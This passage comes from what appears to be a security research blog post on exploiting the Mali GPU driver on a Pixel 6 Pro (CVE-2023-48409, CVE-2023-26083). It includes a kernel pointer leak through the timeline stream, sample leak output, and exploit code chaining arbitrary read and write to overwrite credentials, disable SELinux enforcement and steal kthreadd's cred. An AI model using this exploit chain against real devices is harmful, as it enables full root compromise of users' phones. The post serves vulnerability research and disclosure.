int setfsgid:setfsgid32(gid_t) lp32
int setfsgid:setfsgid(gid_t) lp64
int setfsuid:setfsuid32(uid_t) lp32
int setfsuid:setfsuid(uid_t) lp64
int setgroups:setgroups32(int, const gid_t*) lp32
int setgroups:setgroups(int, const gid_t*) lp64
Funnily, setresuid is explicitly allowed – we can quickly swap setuid(0) with setresuid(0, 0, 0) and verify that it actually works. However, all set*gid syscalls are blocked, which is not exactly crucial, i.e. we could realistically just ignore it. Though if really required, one simple workaround is to patch an allowed syscall (e.g. getuid) to route to setuid(0) and setgid(0), since we have arbitrary write on the kernel anyway.
Disabling SELinux Enforcement
Finally, we have to bypass SELinux as well, since we are in an Android environment. This is also relatively straightforward once we have an arbitrary kernel write, where we clear the selinux_state.enforcing
bit to disable SELinux entirely.
struct selinux_state {
#ifdef CONFIG_SECURITY_SELINUX_DISABLE
bool disabled;
#endif
#ifdef CONFIG_SECURITY_SELINUX_DEVELOP
bool enforcing;
#endif
bool checkreqprot;
bool initialized;
bool policycap[__POLICYDB_CAPABILITY_MAX];
bool android_netlink_route;
bool android_netlink_getneigh;
struct page *status_page;
struct mutex status_lock;
struct selinux_avc *avc;
struct selinux_policy __rcu *policy;
struct mutex policy_mutex;
} __randomize_layout;
A Surprise Discovery
While writing up the above vulnerability, I wanted to take a closer look at how the other vulnerability, CVE-2023-26083, actually worked, and to fully understand exactly why it was said not to work on the Pixel 6 Pro, so that I could elaborate on it better in the introduction. Little did I know, things would not turn out that simple – but in a good way.
Understanding the Timeline Stream Leak
As mentioned in the introduction, the Mali GPU driver provides a feature known as the Timeline Stream (or tlstream), which essentially acts as an event logger. It provides tracepoints via which relevant functions in the driver can log information, alongside the current timestamp, to the stream as events, primarily to aid with performance profiling. While exposing the events may be harmless by itself, they crucially also contain information on some of the variables within the calling functions, including pointers within the kernel (which point to GPU-related objects). This stream is directly exposed to userspace via a file descriptor freely acquirable on demand from the driver, including by unprivileged processes, allowing access to a free kernel pointer leak.
An attempt to patch this vulnerability was first introduced to Google’s Mali codebase back in March 2023 (the month the CVE was issued), and made its way into the July 2023 SPL. This patch adds a permission check, timeline_is_permitted, which is invoked when the process attempts to acquire a file descriptor (e.g. by calling kbase_timeline_io_acquire):
@@ -1,7 +1,7 @@
// SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note
/*
*
- * (C) COPYRIGHT 2019-2022 ARM Limited. All rights reserved.
+ * (C) COPYRIGHT 2019-2023 ARM Limited. All rights reserved.
*
* This program is free software and is provided to you under the terms of the
* GNU General Public License version 2 as published by the Free Software
@@ -30,6 +30,64 @@
#include <linux/version_compat_defs.h>
#include <linux/anon_inodes.h>
+/* Explicitly include epoll header for old kernels. Not required from 4.16. */
+#if KERNEL_VERSION(4, 16, 0) > LINUX_VERSION_CODE
+#include <uapi/linux/eventpoll.h>
+#endif
+
+#ifndef MALI_STRIP_KBASE_DEVELOPMENT
+/* Development builds need to test instrumentation and enable unprivileged
+ * processes to acquire timeline streams, in order to avoid complications
+ * with configurations across multiple platforms and systems.
+ *
+ * Release builds, instead, shall deny access to unprivileged processes
+ * because there are no use cases where they are allowed to acquire timeline
+ * streams, unless they're given special permissions by a privileged process.
+ */
+static int kbase_unprivileged_global_profiling = 1;
+#else
+static int kbase_unprivileged_global_profiling;
+#endif
+
+/**
+ * kbase_unprivileged_global_profiling_set - set permissions for unprivileged processes
+ *
+ * @val: String containing value to set. Only strings representing positive
+ * integers are accepted as valid; any non-positive integer (including 0)
+ * is rejected.
+ * @kp: Module parameter associated with this method.
+ *
+ * This method can only be used to enable permissions for unprivileged processes,
+ * if they are disabled: for this reason, the only values which are accepted are
+ * strings representing positive integers. Since it's impossible to disable
+ * permissions once they're set, any integer which is non-positive is rejected,
+ * including 0.
+ *
+ * Return: 0 if success, otherwise error code.
+ */
+static int kbase_unprivileged_global_profiling_set(const char *val, const struct kernel_param *kp)
+{
+ int new_val;
+ int ret = kstrtoint(val, 0, &new_val);
+
+ if (ret == 0) {
+ if (new_val < 1)
+ return -EINVAL;
+
+ kbase_unprivileged_global_profiling = 1;
+ }
+
+ return ret;
+}
+
+static const struct kernel_param_ops kbase_global_unprivileged_profiling_ops = {
+ .get = param_get_int,
+ .set = kbase_unprivileged_global_profiling_set,
+};
+
+module_param_cb(kbase_unprivileged_global_profiling, &kbase_global_unprivileged_profiling_ops,
+ &kbase_unprivileged_global_profiling, 0600);
+
/* The timeline stream file operations functions. */
static ssize_t kbasep_timeline_io_read(struct file *filp, char __user *buffer,
size_t size, loff_t *f_pos);
@@ -38,6 +96,15 @@
static int kbasep_timeline_io_fsync(struct file *filp, loff_t start, loff_t end,
int datasync);
+static bool timeline_is_permitted(void)
+{
+#if KERNEL_VERSION(5, 8, 0) <= LINUX_VERSION_CODE
+ return kbase_unprivileged_global_profiling || perfmon_capable();
+#else
+ return kbase_unprivileged_global_profiling || capable(CAP_SYS_ADMIN);
+#endif
+}
+
/**
* kbasep_timeline_io_packet_pending - check timeline streams for pending
*
@@ -321,6 +388,9 @@
};
int err;
+ if (!timeline_is_permitted())
+ return -EPERM;
+
if (WARN_ON(!kbdev) || (flags & ~BASE_TLSTREAM_FLAGS_MASK))
return -EINVAL;
@@ -364,7 +434,7 @@
if (WARN_ON(!kbdev) || WARN_ON(IS_ERR_OR_NULL(kbdev->mali_debugfs_directory)))
return;
- file = debugfs_create_file("tlstream", 0444, kbdev->mali_debugfs_directory, kbdev,
+ file = debugfs_create_file("tlstream", 0400, kbdev->mali_debugfs_directory, kbdev,
&kbasep_tlstream_debugfs_fops);
if (IS_ERR_OR_NULL(file))
This was mentioned in the commit message as well:
Permissions have been restricted for the interface to acquire a file descriptor for the Timeline Stream. Unless the user process is privileged, now at least one of these conditions must be satisfied[sic]:
- The kbase_unprivileged_global_profiling module parameter has been set to 1.
- The user process has the CAP_SYS_ADMIN capability.
- The user process has the CAP_PERFMON capability.
kbase_unprivileged_global_profiling is a module parameter which of course only privileged processes can modify, but when MALI_STRIP_KBASE_DEVELOPMENT is not defined, it initializes with a default value of 1. This implies the driver has to be explicitly made to disallow unprivileged processes from accessing the stream (by having the flag set during compilation), yet, sure enough, said flag was not mentioned anywhere else in the code.
Of course, this vulnerability was later properly fixed by removing the flag altogether, when the patched driver code from ARM (r43p0) was merged into the codebase, for December 2023 SPL onwards:
@@ -35,19 +35,7 @@
#include <uapi/linux/eventpoll.h>
#endif
-#ifndef MALI_STRIP_KBASE_DEVELOPMENT
-/* Development builds need to test instrumentation and enable unprivileged
- * processes to acquire timeline streams, in order to avoid complications
- * with configurations across multiple platforms and systems.
- *
- * Release builds, instead, shall deny access to unprivileged processes
- * because there are no use cases where they are allowed to acquire timeline
- * streams, unless they're given special permissions by a privileged process.
- */
-static int kbase_unprivileged_global_profiling = 1;
-#else
static int kbase_unprivileged_global_profiling;
-#endif
/**
* kbase_unprivileged_global_profiling_set - set permissions for unprivileged processes
We can quickly verify this:
- We can check the module parameter via /sys/module/mali_kbase/parameters/kbase_unprivileged_global_profiling (requires su):
raven:/ # cat /sys/module/mali_kbase/parameters/kbase_unprivileged_global_profiling
1
- The KBASE_IOCTL_TLSTREAM_ACQUIRE ioctl command internally calls kbase_timeline_io_acquire. If we do not have the permissions, the function returns -EPERM; otherwise, our file descriptor is returned (see the sketch below).
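A hypothetical sketch of the acquisition step from an unprivileged process, where the struct and ioctl macro are assumed to come from the driver's uapi header and gpu_fd is a /dev/mali0 fd that has completed the setup handshake (flags = 0 stays clear of the CSF-only bits discussed further below):
#include <sys/ioctl.h>
#include "mali_kbase_ioctl.h"   /* assumed location of the uapi definitions */

static int acquire_tlstream(int gpu_fd)
{
    struct kbase_ioctl_tlstream_acquire acq = { .flags = 0 };
    /* returns the new [mali_tlstream] fd, or -1 with errno == EPERM once the
     * December 2023 patch is in place */
    return ioctl(gpu_fd, KBASE_IOCTL_TLSTREAM_ACQUIRE, &acq);
}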
Now that we have acquired the stream, the next step is to read from it:
static ssize_t kbasep_timeline_io_read(struct file *filp, char __user *buffer,
size_t size, loff_t *f_pos)
{
ssize_t copy_len = 0;
struct kbase_timeline *timeline;
KBASE_DEBUG_ASSERT(filp);
KBASE_DEBUG_ASSERT(f_pos);
if (WARN_ON(!filp->private_data))
return -EFAULT;
timeline = (struct kbase_timeline *)filp->private_data;
if (!buffer)
return -EINVAL;
if (*f_pos < 0)
return -EINVAL;
mutex_lock(&timeline->reader_lock);
while (copy_len < size) {
struct kbase_tlstream *stream = NULL;
unsigned int rb_idx_raw = 0;
unsigned int wb_idx_raw;
unsigned int rb_idx;
size_t rb_size;
if (kbasep_timeline_copy_headers(timeline, buffer, size, // [1]
&copy_len)) {
copy_len = -EFAULT;
break;
}
/* If we already read some packets and there is no
* packet pending then return back to user.
* If we don't have any data yet, wait for packet to be
* submitted.
*/
if (copy_len > 0) {
if (!kbasep_timeline_io_packet_pending(
timeline, &stream, &rb_idx_raw))
break;
} else {
if (wait_event_interruptible(
timeline->event_queue,
kbasep_timeline_io_packet_pending(
timeline, &stream, &rb_idx_raw))) {
copy_len = -ERESTARTSYS;
break;
}
}
if (WARN_ON(!stream)) {
copy_len = -EFAULT;
break;
}
/* Check if this packet fits into the user buffer.
* If so copy its content.
*/
rb_idx = rb_idx_raw % PACKET_COUNT;
rb_size = atomic_read(&stream->buffer[rb_idx].size);
if (rb_size > size - copy_len)
break;
if (copy_to_user(&buffer[copy_len], stream->buffer[rb_idx].data, // [2]
rb_size)) {
copy_len = -EFAULT;
break;
}
/* If the distance between read buffer index and write
* buffer index became more than PACKET_COUNT, then overflow
* happened and we need to ignore the last portion of bytes
* that we have just sent to user.
*/
smp_rmb();
wb_idx_raw = atomic_read(&stream->wbi);
if (wb_idx_raw - rb_idx_raw < PACKET_COUNT) {
copy_len += rb_size;
atomic_inc(&stream->rbi);
#if MALI_UNIT_TEST
atomic_add(rb_size, &timeline->bytes_collected);
#endif /* MALI_UNIT_TEST */
} else {
const unsigned int new_rb_idx_raw =
wb_idx_raw - PACKET_COUNT + 1;
/* Adjust read buffer index to the next valid buffer */
atomic_set(&stream->rbi, new_rb_idx_raw);
}
}
mutex_unlock(&timeline->reader_lock);
return copy_len;
}
When we read from the stream, kbasep_timeline_io_read is called, which first dumps all the headers (essentially a “menu” of tracepoint prototypes) before anything else ([1]). After skipping through that part, we can read packet by packet, copying each packet only if it still fits into our user buffer ([2]). Then, following the serialization format, we get a sample output as shown below (fully from an unprivileged context):
raven:/data/local/tmp $ ./leak
[+] Current tgid: 0x1b25
>>> 928 bytes read
[ 101.254117] KBASE_TL_NEW_LPU(lpu=0xffffff8010ecf1d0, lpu_nr=0x0, lpu_fn=0x20e)
[ 101.254118] KBASE_TL_NEW_LPU(lpu=0xffffff8010ecf1d4, lpu_nr=0x1, lpu_fn=0x1c9e)
[ 101.254118] KBASE_TL_NEW_LPU(lpu=0xffffff8010ecf1d8, lpu_nr=0x2, lpu_fn=0x1e)
[ 101.254118] KBASE_TL_NEW_AS(address_space=0xffffff8010ece4f0, as_nr=0x0)
[ 101.254118] KBASE_TL_NEW_AS(address_space=0xffffff8010ece5a8, as_nr=0x1)
[ 101.254119] KBASE_TL_NEW_AS(address_space=0xffffff8010ece660, as_nr=0x2)
[ 101.254119] KBASE_TL_NEW_AS(address_space=0xffffff8010ece718, as_nr=0x3)
[ 101.254119] KBASE_TL_NEW_AS(address_space=0xffffff8010ece7d0, as_nr=0x4)
[ 101.254120] KBASE_TL_NEW_AS(address_space=0xffffff8010ece888, as_nr=0x5)
[ 101.254120] KBASE_TL_NEW_AS(address_space=0xffffff8010ece940, as_nr=0x6)
[ 101.254120] KBASE_TL_NEW_AS(address_space=0xffffff8010ece9f8, as_nr=0x7)
[ 101.254120] KBASE_TL_NEW_GPU(gpu=0xffffff8010ecc000, gpu_id=0x92020010, core_count=0x14)
[ 101.254121] KBASE_TL_LIFELINK_LPU_GPU(lpu=0xffffff8010ecf1d0, gpu=0xffffff8010ecc000)
[ 101.254121] KBASE_TL_LIFELINK_LPU_GPU(lpu=0xffffff8010ecf1d4, gpu=0xffffff8010ecc000)
[ 101.254121] KBASE_TL_LIFELINK_LPU_GPU(lpu=0xffffff8010ecf1d8, gpu=0xffffff8010ecc000)
[ 101.254122] KBASE_TL_LIFELINK_AS_GPU(address_space=0xffffff8010ece4f0, gpu=0xffffff8010ecc000)
[ 101.254122] KBASE_TL_LIFELINK_AS_GPU(address_space=0xffffff8010ece5a8, gpu=0xffffff8010ecc000)
[ 101.254122] KBASE_TL_LIFELINK_AS_GPU(address_space=0xffffff8010ece660, gpu=0xffffff8010ecc000)
[ 101.254123] KBASE_TL_LIFELINK_AS_GPU(address_space=0xffffff8010ece718, gpu=0xffffff8010ecc000)
[ 101.254123] KBASE_TL_LIFELINK_AS_GPU(address_space=0xffffff8010ece7d0, gpu=0xffffff8010ecc000)
[ 101.254123] KBASE_TL_LIFELINK_AS_GPU(address_space=0xffffff8010ece888, gpu=0xffffff8010ecc000)
[ 101.254123] KBASE_TL_LIFELINK_AS_GPU(address_space=0xffffff8010ece940, gpu=0xffffff8010ecc000)
[ 101.254124] KBASE_TL_LIFELINK_AS_GPU(address_space=0xffffff8010ece9f8, gpu=0xffffff8010ecc000)
[ 101.254124] KBASE_TL_NEW_CTX(ctx=0xffffffc01f09d000, ctx_nr=0xf, tgid=0x1b25)
[ 101.254125] KBASE_TL_NEW_CTX(ctx=0xffffffc01ee1d000, ctx_nr=0xe, tgid=0xc1e)
[ 101.254126] KBASE_TL_NEW_CTX(ctx=0xffffffc01d72d000, ctx_nr=0xd, tgid=0x15b3)
[ 101.254127] KBASE_TL_NEW_CTX(ctx=0xffffffc01c585000, ctx_nr=0xc, tgid=0x10af)
[ 101.254129] KBASE_TL_NEW_CTX(ctx=0xffffffc01a6fd000, ctx_nr=0xb, tgid=0xe6d)
[ 101.254130] KBASE_TL_NEW_CTX(ctx=0xffffffc01924d000, ctx_nr=0xa, tgid=0x98f)
[ 101.254132] KBASE_TL_NEW_CTX(ctx=0xffffffc018edd000, ctx_nr=0x8, tgid=0x45f)
[ 101.254133] KBASE_TL_NEW_CTX(ctx=0xffffffc016525000, ctx_nr=0x5, tgid=0x806)
[ 101.254135] KBASE_TL_NEW_CTX(ctx=0xffffffc015655000, ctx_nr=0x3, tgid=0x3c1)
[ 101.254136] KBASE_TL_NEW_CTX(ctx=0xffffffc015801000, ctx_nr=0x2, tgid=0x3dc)
[ 101.254137] KBASE_TL_NEW_CTX(ctx=0xffffffc00f9ad000, ctx_nr=0x0, tgid=0x27c)
(The above output is all from a single kbase_create_timeline_objects invocation, when the stream is first established.)
This also shows that the vulnerability itself does indeed exist on the device, so why couldn’t we use it directly in the original exploit?
Command Stream Frontend
3rd generation Valhall GPUs saw the introduction of the Command Stream Frontend (CSF) as a replacement for its former Job Manager (JM) model, to better adapt to the demands of modern APIs like Vulkan. The gist of it is, as the name suggests, GPU jobs are now submitted via a command stream, which makes it easier to craft and send updates on a more granular and flexible level, consequently bringing down CPU usage. On the kernel driver side, since the way it interfaces with the GPU has been effectively overhauled, this change manifests as a whole different set of APIs exposed to the userspace.
Pixel 6 Pro, our target device, utilizes Mali-G78, a 2nd generation Valhall GPU, which lacks support for CSF, unlike later devices like Pixel 7/8. Interestingly, Google more or less maintains a single codebase for its Mali implementation (of course with device-specific patches in different branches); the difference in functionality is handled entirely via a single config: MALI_USE_CSF. For example, in kbase_ioctl:
#if !MALI_USE_CSF
case KBASE_IOCTL_POST_TERM:
KBASE_HANDLE_IOCTL(KBASE_IOCTL_POST_TERM,
kbase_api_post_term,
kctx);
break;
#endif /* !MALI_USE_CSF */
case KBASE_IOCTL_MEM_ALLOC:
KBASE_HANDLE_IOCTL_INOUT(KBASE_IOCTL_MEM_ALLOC,
kbase_api_mem_alloc,
union kbase_ioctl_mem_alloc,
kctx);
break;
#if MALI_USE_CSF
case KBASE_IOCTL_MEM_ALLOC_EX:
KBASE_HANDLE_IOCTL_INOUT(KBASE_IOCTL_MEM_ALLOC_EX, kbase_api_mem_alloc_ex,
union kbase_ioctl_mem_alloc_ex, kctx);
break;
#endif
case KBASE_IOCTL_MEM_QUERY:
KBASE_HANDLE_IOCTL_INOUT(KBASE_IOCTL_MEM_QUERY,
kbase_api_mem_query,
union kbase_ioctl_mem_query,
kctx);
break;
Knowing this, going back to the timeline acquisition:
int kbase_timeline_io_acquire(struct kbase_device *kbdev, u32 flags)
{
/* The timeline stream file operations structure. */
static const struct file_operations kbasep_tlstream_fops = {
.owner = THIS_MODULE,
.release = kbasep_timeline_io_release,
.read = kbasep_timeline_io_read,
.poll = kbasep_timeline_io_poll,
.fsync = kbasep_timeline_io_fsync,
};
int err;
if (!timeline_is_permitted())
return -EPERM;
if (WARN_ON(!kbdev) || (flags & ~BASE_TLSTREAM_FLAGS_MASK))
return -EINVAL;
err = kbase_timeline_acquire(kbdev, flags);
if (err)
return err;
err = anon_inode_getfd("[mali_tlstream]", &kbasep_tlstream_fops, kbdev->timeline,
O_RDONLY | O_CLOEXEC);
if (err < 0)
kbase_timeline_release(kbdev->timeline);
return err;
}
One of the checks ensures that only supported flags can be set in the ioctl call, otherwise -EINVAL is returned. What are the supported flags? Well, BASE_TLSTREAM_FLAGS_MASK is defined in one of two locations, depending on CSF support:
common/include/uapi/gpu/arm/midgard/jm/mali_base_jm_kernel.h:
/* Flags for base tracepoint specific to JM */
#define BASE_TLSTREAM_FLAGS_MASK (BASE_TLSTREAM_ENABLE_LATENCY_TRACEPOINTS | \
BASE_TLSTREAM_JOB_DUMPING_ENABLED)
(which are 1<<0 and 1<<1 respectively.)
common/include/uapi/gpu/arm/midgard/csf/mali_base_csf_kernel.h:
/* Flags for base tracepoint specific to CSF */
/* Enable KBase tracepoints for CSF builds */
#define BASE_TLSTREAM_ENABLE_CSF_TRACEPOINTS (1 << 2)
/* Enable additional CSF Firmware side tracepoints */
#define BASE_TLSTREAM_ENABLE_CSFFW_TRACEPOINTS (1 << 3)
#define BASE_TLSTREAM_FLAGS_MASK (BASE_TLSTREAM_ENABLE_LATENCY_TRACEPOINTS | \
BASE_TLSTREAM_JOB_DUMPING_ENABLED | \
BASE_TLSTREAM_ENABLE_CSF_TRACEPOINTS | \
BASE_TLSTREAM_ENABLE_CSFFW_TRACEPOINTS)
This means that as long as the CSF-specific flags are not set in our ioctl call, we can acquire a file descriptor just fine.
Hence, the actual issue here is not regarding tlstream itself, but instead simply that kbase_kcpu_command_queue, a CSF feature, is not available on our target device, and we will have to hunt for a different object whose address we can leak.
The Golden Object: kbase_context
After a quick session of digging around in the source code, I found a different low-hanging fruit: kbase_context gets its address leaked immediately from context creation, and it contains a task_struct pointer, directly pointing to our current task!
For context, kbase_context, as the name implies, can be thought of as representing the session information for the duration a process interfaces with the driver, for example when allocating pages. As this then implies, there must already have been a corresponding kbase_context pretty early on. Indeed, kbase_context (kctx) is created after we perform a basic setup on a file descriptor that we have open-ed (which makes sense for a “context” to be established):
KBASE_IOCTL_VERSION_CHECK (ioctl)
  kbase_ioctl
    -> kbase_api_handshake
      -> kbase_file_set_api_version
        -> atomic_set(&kfile->setup_state, KBASE_FILE_NEED_CTX);

KBASE_IOCTL_SET_FLAGS (ioctl)
  kbase_ioctl
    -> kbase_api_set_flags
      -> kbase_file_create_kctx [requires KBASE_FILE_NEED_CTX]
        -> kbase_create_context
          -> kctx = vzalloc(sizeof(*kctx));
        -> atomic_set(&kfile->setup_state, KBASE_FILE_COMPLETE);
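As a hedged sketch, the whole setup boils down to a handful of calls (struct layouts are assumed from the driver's uapi headers, and the version numbers are illustrative):
#include <fcntl.h>
#include <sys/ioctl.h>
#include "mali_kbase_ioctl.h"   /* assumed location of the uapi definitions */

static int setup_gpu_fd(void)
{
    int gpu_fd = open("/dev/mali0", O_RDWR);

    struct kbase_ioctl_version_check vc = { .major = 11, .minor = 0 };
    ioctl(gpu_fd, KBASE_IOCTL_VERSION_CHECK, &vc);   /* -> KBASE_FILE_NEED_CTX */

    struct kbase_ioctl_set_flags sf = { .create_flags = 0 };
    ioctl(gpu_fd, KBASE_IOCTL_SET_FLAGS, &sf);       /* kctx created -> KBASE_FILE_COMPLETE */

    return gpu_fd;
}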
Unsurprisingly, we need to have completed the setup in order to trigger either vulnerability in the first place:
static long kbase_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
{
struct kbase_file *const kfile = filp->private_data;
struct kbase_context *kctx = NULL;
struct kbase_device *kbdev = kfile->kbdev;
void __user *uarg = (void __user *)arg;
/* Only these ioctls are available until setup is complete */
switch (cmd) {
...
}
kctx = kbase_file_get_kctx_if_setup_complete(kfile);
if (unlikely(!kctx))
return -EPERM;
/* Normal ioctls */
switch (cmd) {
...
case KBASE_IOCTL_TLSTREAM_ACQUIRE:
KBASE_HANDLE_IOCTL_IN(KBASE_IOCTL_TLSTREAM_ACQUIRE,
kbase_api_tlstream_acquire,
struct kbase_ioctl_tlstream_acquire,
kctx);
break;
...
case KBASE_IOCTL_BUFFER_LIVENESS_UPDATE:
KBASE_HANDLE_IOCTL_IN(KBASE_IOCTL_BUFFER_LIVENESS_UPDATE,
kbase_api_buffer_liveness_update,
struct kbase_ioctl_buffer_liveness_update,
kctx);
break;
}
dev_warn(kbdev->dev, "Unknown ioctl 0x%x nr:%d", cmd, _IOC_NR(cmd));
return -ENOIOCTLCMD;
}
Now, combined with our preexisting read/write primitive (via underflowing a pipe_buffer), we don’t even have to find an address to place a puppet pipe_buffer object – we can chain just a small number of underflows to hijack our cred directly:
uint64_t kctx, cur_task, cur_cred;
kctx = leak_from_tlstream(stream_fd, getpid());           // kbase_context address leaked via the tlstream
aar(kctx+TASK_OFFSET, &cur_task, sizeof(cur_task));       // kctx -> our task_struct
aar(cur_task+CRED_OFFSET, &cur_cred, sizeof(cur_cred));   // task_struct -> cred
char buf[0x20] = {0};
aaw(cur_cred, buf, sizeof(buf));                          // zero the id fields at the start of struct cred
To chain the underflows, we can abuse the LIFO nature of the page allocator freelist. First, we allocate a dummy pipe where we want the malicious object to go in preparation. Then, when we want to trigger an underflow write, we resize the pipe such that it frees its order-2 block, allowing us to allocate the malicious object where the pipe originally was. And since the object is freed immediately after, we simply resize the pipe back to take up the newly freed block to hold onto it for future use.
fcntl(dummy_pipe_fd[1], F_SETPIPE_SZ, 0x10*0x1000); // free the order-2 block
ioctl(gpu_fd, KBASE_IOCTL_BUFFER_LIVENESS_UPDATE, &payload);
fcntl(dummy_pipe_fd[1], F_SETPIPE_SZ, 0x100*0x1000); // alloc back the order-2 block
This does make it less reliable since we have more points of failure (one bad underflow and the kernel crashes from CONFIG_HARDENED_USERCOPY), but in practice, based on testing, it does not happen very often.
Cleaning Up: Making the Exploit Practical
As mentioned previously, on Android, clearing the uid/gid alone is not enough to obtain full privileges. Here are some more things to consider:
- We don’t have all capabilities yet. This is not an issue; we just extend our write past the uid/gid fields to write ourselves full capabilities.
- SELinux is not yet disabled – manually overriding it (setenforce 0) doesn’t work either since we don’t have the proper sid. Changing the sid is another read+write away (((struct task_security_struct *)cred->security)->sid).
- The process sandbox is still in effect, preventing syscalls like init_module. Disabling the sandbox is another write away (current->thread_info.flags).
- Exiting the process crashes the kernel because our pipe_buffer.ops field is still invalid.
As an alternative, we could also choose to replace the whole cred altogether:
- Leak any kernel text pointer via our task_struct (e.g. restart_block.fn). We also get to revert the pipe_buffer.ops field to its original value this way.
- Disable SELinux via selinux_state.
- Obtain a privileged cred pointer via kthreadd_task.
- Overwrite our current task_struct’s cred pointer with the above.
uint64_t kctx, cur_task, restart_block_fn, kthreadd_task, kthreadd_task_cred;
kctx = leak_from_tlstream(stream_fd, getpid());
aar(kctx+TASK_OFFSET, &cur_task, sizeof(cur_task));
aar(cur_task+RESTART_OFFSET, &restart_block_fn, sizeof(cur_task));                // leak a kernel text pointer
uint64_t kernel_base = restart_block_fn-RESTART_KERN_OFF;
pipe_ptr->ops = (const void *)(kernel_base+PIPE_OPS_KERN_OFF);                    // restore valid pipe_buffer ops
char selinux_write = 0;
aaw(kernel_base+SELINUX_STATE_KERN_OFF, &selinux_write, sizeof(selinux_write));   // selinux_state.enforcing = 0
aar(kernel_base+KTHREADD_TASK_KERN_OFF, &kthreadd_task, sizeof(kthreadd_task));
aar(kthreadd_task+CRED_OFFSET, &kthreadd_task_cred, sizeof(kthreadd_task_cred));  // a fully privileged cred
uint64_t cred_write[2] = { kthreadd_task_cred, kthreadd_task_cred };
aaw(cur_task+CRED_OFFSET-sizeof(cred_write[0]), cred_write, sizeof(cred_write));  // overwrite real_cred and cred
Conclusion
This research successfully demonstrated that Pixel 6 Pro could be exploited using a single vulnerability, challenging the conventional wisdom that both CVE-2023-48409 and CVE-2023-26083 were required.
Android really has its interesting share of quirks, some of which (mostly) strengthen its defenses and others of which (perhaps unintentionally) weaken them compared to plain old Linux, as demonstrated in the exploit process above.
As for the two vulnerabilities analyzed, this post hopefully highlights how simple weaknesses can still be readily found in complex kernel drivers, sometimes without even much setup required, as well as the damage they can cause. I was particularly impressed by the second vulnerability (originally meant to be just a footnote), seeing how a flexible “tech” can play different roles according to what is available and what is required for the exploit.
Closing off, I would like to thank my mentor, Peter, for his patient support and tons of spot-on advice, as well as everyone at STAR Labs, for the amazing internship experience and opportunity!
References
- https://github.com/0x36/Pixel_GPU_Exploit
- Source codes:
- CVEs: CVE-2023-48409, CVE-2023-26083
- https://sam4k.com/linternals-memory-allocators-part-1/
- https://blog.zolutal.io/understanding-paging/
- https://i.blackhat.com/USA-22/Thursday/US-22-WANG-Ret2page-The-Art-of-Exploiting-Use-After-Free-Vulnerabilities-in-the-Dedicated-Cache.pdf
- https://lpc.events/event/2/contributions/65/attachments/15/171/slides-expanded.pdf
- https://source.android.com/docs/security/features/selinux/concepts